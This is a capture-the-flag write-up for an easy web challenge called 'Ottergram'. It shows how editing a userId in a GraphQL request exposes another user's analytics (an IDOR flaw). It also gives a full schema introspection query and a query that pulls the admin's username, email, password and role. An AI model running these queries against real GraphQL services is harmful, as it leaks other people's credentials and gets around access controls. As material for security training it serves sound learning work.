# Ottergram
Level: Easy\
Points: 10\
Type: Daily Challenge
After sign-up / login flow. There is a POST request to /graphql which fetch the analytics.
Viewing it in proper format
We can edit the userId field and get analytics of another user.\
admin's userid is 2
Dumping the ENTIRE Schema
```
query {
__schema {
types {
name
fields {
name
type {
name
kind
}
}
}
}
}
```
explaination
```
query
└── __schema ← the entire schema of the API
└── types ← list of ALL types defined
├── name ← name of the type (e.g. "User", "Analytics")
└── fields ← list of fields on that type
├── name ← field name (e.g. "username", "password")
└── type ← what data type this field returns
├── name ← type name (e.g. "String", "Int")
└── kind ← category (SCALAR, OBJECT, NON_NULL, LIST)
```
### Key Findings
There are **2 queries** and the `User` type has juicy fields:
| Query | Returns |
| ------------------- | ----------------------------------------- |
| `analytics(userId)` | Analytics |
| `user(???)` | **User** with `email`, `password`, `role` |
Lets get the username and password data.
```
query {
user(id: 2) {
id
username
email
password
role
}
}
```
